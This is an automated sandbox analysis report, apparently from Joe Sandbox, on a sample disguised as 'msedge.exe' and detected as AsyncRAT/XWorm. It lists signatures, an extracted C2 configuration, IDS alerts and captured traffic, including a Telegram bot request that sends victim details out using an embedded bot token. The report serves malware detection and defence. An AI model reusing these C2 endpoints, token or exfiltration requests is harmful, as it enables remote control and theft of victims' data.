Windows Analysis Report
msedge.exe

Overview

General Information

Sample name:	msedge.exe
Analysis ID:	1566853
MD5:	f1c2525da4f545e783535c2875962c13
SHA1:	92bf515741775fac22690efc0e400f6997eba735
SHA256:	9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
Tags:	AsyncRATexeXWORMuser-DAVWE
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: msedge.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: msedge.exe

Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/ZnhxAV6a"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: msedge.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: msedge.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: msedge.exe	String decryptor: https://pastebin.com/raw/ZnhxAV6a
Source: msedge.exe	String decryptor: <123456789>
Source: msedge.exe	String decryptor: <Xwormmm>
Source: msedge.exe	String decryptor: USB.exe

Uses 32bit PE files

Source: msedge.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50062 version: TLS 1.2

Source: msedge.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb@w^ source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: .pdb. source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdbHm source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\msedge.PDB7 source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdbx source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdbhG source: WER1A3A.tmp.dmp.14.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 147.185.221.24:3865
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49822 -> 147.185.221.24:3865

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/ZnhxAV6a

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 147.185.221.24:3865

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /raw/ZnhxAV6a HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.24 147.185.221.24

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/ZnhxAV6a HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: upon-forming.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: i.ibb.co

Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.ibb.co
Source: msedge.exe, 00000000.00000002.3551685304.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: msedge.exe, msedge.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: msedge.exe, 00000000.00000002.3551685304.0000000002A4B000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co
Source: msedge.exe, msedge.exe.0.dr	String found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
Source: msedge.exe, 0000000B.00000002.3530961194.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/ZnhxAV6a

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
